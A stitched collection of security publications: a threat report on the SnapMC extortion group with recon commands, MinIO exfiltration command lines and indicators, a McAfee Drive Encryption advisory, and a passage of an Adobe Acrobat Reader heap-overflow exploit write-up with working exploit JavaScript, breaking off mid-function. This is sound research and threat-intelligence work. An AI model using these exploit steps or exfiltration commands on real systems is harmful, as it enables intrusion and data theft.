Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. In the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate. These deadlines are rarely abided by since we have seen the attacker to start increasing the pressure well before countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets.

Modus Operandi

Initial Access

At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:

Remote code execution in Telerik UI for ASPX.NET [1]
SQL injections

After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2].

Directly afterwards PowerShell is started to perform some standard reconnaissance activity:

whoami
whoami /priv
wmic logicaldisk get caption,description,providername
net users /priv

Note: that in the last command the adversary used the ‘/priv’ option, which is not a valid option for the net users command.

Privilege Escalation

In most of the cases we analyzed the threat actor did not perform privilege escalation. However in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:

Invoke-Nightmare [3]
Invoke-JuicyPotato [4]
Invoke-ServiceAbuse [4]
Invoke-EventVwrBypass [6]
Invoke-PrivescAudit [7]

Collection & Exfiltration

We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:

C:\Windows\Temp\
C:\Windows\Temp\Azure
C:\Windows\Temp\Vmware

SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility.

The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio.

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET> 

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY>

Mitigations

First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective way to prevent falling victim to these types attacks. Make sure to identify where vulnerable software resides within your network by (regularly performing) vulnerability scanning.

Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization, and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident.

Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became clear that when the software component resided behind a well configured Web Application Firewall (WAF), the exploit would be unsuccessful.

Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection, and efficient response will reduce the damage even before it materializes.

Conclusion

NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware. While in the data breach extortion attacks, most of the activity could even be automated and takes less time while still having a significant impact. Therefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.

MITRE ATT&CK mapping

Tactic	Technique	Procedure
Reconnaissance	T1595.002 – Vulnerability scanning	SnapMC used the Acunetix vulnerability scanner to find systems running vulnerable Telerik software.
Initial Access	T1190 – Exploit Public Facing Application(s)	SnapMC exploited CVE-2019-18935 and SQL Injection.
Privilege Escalation		SnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.
Execution	T1059.001 – PowerShell	SnapMC used a combination of publicly available PowerShell cmdlets.
Collection	T1560.001 – Archive via Utility	SnapMC used 7zip to prepare data for exfiltration.
Exfiltration	T1567 – Exfiltration over Web Service T1567.002 – Exfiltration to Cloud Storage	SnapMC used MinIO client (mc.exe) to exfiltrate data.

MITRE ATT&CK

Indicators of Compromise

Type	Data	Notes
File location + file name	C:\Windows\Temp[0-9]{10}.[0-9]{1,8}.dll (Example: c:\Windows\Temp\1628862598.87034184.dll)	File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and last part is randomly generated
File location + file name	C:\Windows\Temp\7za.exe	7zip archiving utility
File name	s.ps1	SQL cmdlet
File name	a.ps1	SQL cmdlet
File name	x.ps1	SQL cmdlet
File name	*.par.minio	Temporary files created by MinIO during exfiltration
File location	C:\Windows\Temp\Azure\	Folder for temporary files created by MinIO
File location	C:\Windows\Temp\Vmware\	Folder for temporary files created by MinIO
File name	mc.exe	MinIO client
Hash	651ed548d2e04881d0ff24f789767c0e	MD5 hash of MinIO client
Hash	b4171d48df233978f8cf58081b8ad9dc51a6097f	SHA1 hash of MinIO client
Hash	0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e	SHA265 hash of MinIO client

Indicators of Compromise

References

NCC Group Research
Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)balazs.bucsay
4 October 2021 at 15:37

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

NCC Group Research

By: balazs.bucsay

4 October 2021 at 15:37

Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTL was referencing an event that was set to NULL before initialization. In case the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existing structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Even structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to the Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  October 4, 2021

Written by:  Balazs Bucsay

Exodus Intelligence
Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DCExodus Intel VRT
4 October 2021 at 13:52

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

Exodus Intelligence

By: Exodus Intel VRT

4 October 2021 at 13:52

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14^th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. It analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-39863

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax

[Truncated]

  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;

[1]

  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )
  {

[2]

    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
    {
LABEL_9:
      *a5 = -2;
      return 0;
    }
    v7 = lpString;
  }
  else
  {

[3]

    v78[1] = v78[0];
  }
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_86;
  }

[4]

  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
  {
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
  }
  else
  {
    v12 = iMaxLength[0];
  }

[5]

  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
  {
    v13 = v12 + 2;
  }
  else
  {
LABEL_25:
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  }
  iMaxLength[1] = v13;

[6]

  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
  {
    *a5 = -7;
    return 0;
  }

[7]

  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);

[8]

  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
  {
    v17 = v78[1] + 2;
  }
  else
  {
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  }
  v78[1] = v17;

[9]

  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
  {
    *a5 = -7;
LABEL_86:
    v5 = 0;
    goto LABEL_87;
  }

[10]

  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;

[11]

  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
  {
    *a5 = v20;
    goto LABEL_86;
  }
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
  {
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  }
  if ( *lpString )
  {
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
    {
      if ( (unsigned __int16)sub_25803155(v50) )
      {
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
        {
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
          --v44;
        }
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
        {
          if ( *v59 != 47 )
          {

[12]

            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
            {
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            }
            if ( v46 )
            {

[13]

              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
              {
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                else
                  *(_BYTE *)v6 = 0;
              }
            }
            if ( v58 )
            {

[14]

              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            }
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          }
          v71 = v58;
          v72 = v59;
        }

[Truncated]

LABEL_87:
  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141

[Truncated]

09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
093499e8  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a08  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a28  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter (i.e. the base URL) is a valid Unicode UTF-16BE encoded string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
{
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
  do
  {
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
      break;
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
      break;
    v3 += 2;
  }
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
LABEL_10:
  if ( !v2 )
    result = v3;
  else
LABEL_12:
    result = -1;
  return result;
}

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

The string must terminate with a double null byte.
The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter (i.e. the relative URL). At [5] the length of the Source variable (i.e. the base URL) is calculated taking into account its encoding. The function sub_25802A44() is an implementation of the strlen() function that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling the function sub_25802CD5(), which is an implementation of the known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using the function sub_25802D98(), which is an implementation of the strncpy function that works for both Unicode and ANSI encoded strings. These operations performed on the Source variable are equally performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_sub_25818C6A(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[15]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[16]

    sub_258189D6(Destination, Source);
    result = 1;
  }
  else
  {

[17]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [15] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[18]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[19]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[20]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution.

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

Address Space Layout Randomization (ASLR)
Data Execution Prevention (DEP)
Control Flow Guard (CFG)

The exploit does not bypass the following protection mechanisms:

Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
